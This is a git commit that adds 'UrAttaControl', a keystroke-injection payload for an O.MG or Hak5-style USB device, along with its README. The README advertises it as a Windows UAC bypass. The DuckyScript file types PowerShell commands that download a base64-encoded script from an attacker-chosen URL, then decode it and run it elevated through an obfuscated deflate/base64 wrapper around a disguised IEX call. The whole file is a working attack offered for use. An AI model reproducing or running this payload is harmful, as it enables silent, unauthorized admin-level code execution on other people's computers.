mirror of https://github.com/hak5/omg-payloads.git
Add files via upload
parent
432b563707
commit
0ff7e67533
|
@ -0,0 +1,104 @@
|
|||
![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)
|
||||
|
||||
<!-- TABLE OF CONTENTS -->
|
||||
<details>
|
||||
<summary>Table of Contents</summary>
|
||||
<ol>
|
||||
<li><a href="#Description">Description</a></li>
|
||||
<li><a href="#getting-started">Getting Started</a></li>
|
||||
<li><a href="#Contributing">Contributing</a></li>
|
||||
<li><a href="#Version-History">Version History</a></li>
|
||||
<li><a href="#Contact">Contact</a></li>
|
||||
<li><a href="#Acknowledgments">Acknowledgments</a></li>
|
||||
</ol>
|
||||
</details>
|
||||
|
||||
# UrAttaControl
|
||||
|
||||
A script used to open an elevated powershell console and execute admin level commands
|
||||
|
||||
## Description
|
||||
|
||||
Completely ran from the execute file. Replace the URL in that file with yours leading to a base64 script
|
||||
|
||||
This script will use IEX to download a base64 script to the $Payload variable
|
||||
|
||||
Using a keystroke injections attack a heavily obfuscated and encoded snippet will download and execute any base64
|
||||
|
||||
script saved in the $Payload variable
|
||||
|
||||
This payload completely bypasses the UAC and will run any admin level script without a prompt
|
||||
|
||||
You can use this function I wrote to convert your .ps1 sscripts to Base64
|
||||
|
||||
https://github.com/I-Am-Jakoby/PowerShell-for-Hackers/blob/main/Functions/B64.md
|
||||
|
||||
## Getting Started
|
||||
|
||||
### Dependencies
|
||||
|
||||
* DropBox or other file sharing service - Your Shared link for the intended file
|
||||
* Windows 10,11
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
### Executing program
|
||||
|
||||
* Plug in your device
|
||||
* A keystroke injection based payload will run
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
## Contributing
|
||||
|
||||
All contributors names will be listed here
|
||||
|
||||
I am Jakoby
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
## Version History
|
||||
|
||||
* 0.1
|
||||
* Initial Release
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
<!-- CONTACT -->
|
||||
## Contact
|
||||
|
||||
<div><h2>I am Jakoby</h2></div>
|
||||
<p><br/>
|
||||
|
||||
<img src="https://media.giphy.com/media/VgCDAzcKvsR6OM0uWg/giphy.gif" width="50">
|
||||
|
||||
<a href="https://github.com/I-Am-Jakoby/">
|
||||
<img src="https://img.shields.io/badge/GitHub-I--Am--Jakoby-blue">
|
||||
</a>
|
||||
|
||||
<a href="https://www.instagram.com/i_am_jakoby/">
|
||||
<img src="https://img.shields.io/badge/Instagram-i__am__jakoby-red">
|
||||
</a>
|
||||
|
||||
<a href="https://twitter.com/I_Am_Jakoby/">
|
||||
<img src="https://img.shields.io/badge/Twitter-I__Am__Jakoby-blue">
|
||||
</a>
|
||||
|
||||
<a href="https://www.youtube.com/c/IamJakoby/">
|
||||
<img src="https://img.shields.io/badge/YouTube-I_am_Jakoby-red">
|
||||
</a>
|
||||
|
||||
Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-UrAttaControl)
|
||||
</p>
|
||||
|
||||
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
<!-- ACKNOWLEDGMENTS -->
|
||||
## Acknowledgments
|
||||
|
||||
* [Hak5](https://hak5.org/)
|
||||
* [MG](https://github.com/OMG-MG)
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
|
@ -0,0 +1,30 @@
|
|||
REM Title: UrAttaControl
|
||||
|
||||
REM Author: I am Jakoby
|
||||
|
||||
REM Description: This is a UAC bypass payload that will open an elevated powershell console and run any script.
|
||||
REM Reaplce the URL down below with a link to a base64 encoded payload you have. See README.md for more details
|
||||
|
||||
REM Target: Windows 10, 11
|
||||
|
||||
REM NOTES: Additionally instead of pulling down your script with IWR you can hardcode the Base64 script to the $Payload variable
|
||||
REM EXAMPLE: $Payload = "cwB0AGEAcgB0ACAAbgBvAHQAZQBwAGEAZAA=" - This Base64 script will open notepad
|
||||
|
||||
REM You can use this function I wrote to convert your .ps1 sscripts to Base64
|
||||
REM https://github.com/I-Am-Jakoby/PowerShell-for-Hackers/blob/main/Functions/B64.md
|
||||
|
||||
GUI r
|
||||
DELAY 500
|
||||
STRING powershell
|
||||
ENTER
|
||||
|
||||
DELAY 1000
|
||||
|
||||
STRING $url = "YOUR-URL-WITH-BASE64-ENCODED-SCRIPT"
|
||||
SHIFT ENTER
|
||||
STRING $Payload = (Invoke-WebRequest $url'?dl=1').Content
|
||||
SHIFT ENTER
|
||||
STRING ( nEw-obJECt Io.cOMprEssion.dEfLAtEStreAM([iO.MEMoRysTream][coNVerT]::FrOMBasE64sTring( 'hY69CsIwFEZf5RK6ph0ci1MHBZEKQacsoflahfyRRKpvb1MQnOp2h3vOd6r+fNiz4GfEdIcxNV4gDjdQdVFv45Um1kZMpPRyHU/dVQo/5llFyM6olJBk7e0kRaFlH+Dk4K1VTjNqNFWLn5rxn8ImnpDzw01Jds94Q1xpVtSs8KPXy0BALIGtyCpmLgwQiCfarXoNg4zNSPZN2f79rVmRDw=='), [SySTEM.Io.cOmprEsSION.comprEsSiOnmOdE]::DECoMPress )| ForeAch{ nEw-obJECt IO.stReaMReAdEr( $_, [SYSTEm.TEXT.encODINg]::aSciI ) } |ForEaCh { $_.rEAdtoENd() } )|& ( $VeRBosEPreFEreNcE.tosTRING()[1,3]+'x'-joIN'')
|
||||
SHIFT ENTER
|
||||
STRING exit
|
||||
ENTER
|
Loading…
Reference in New Issue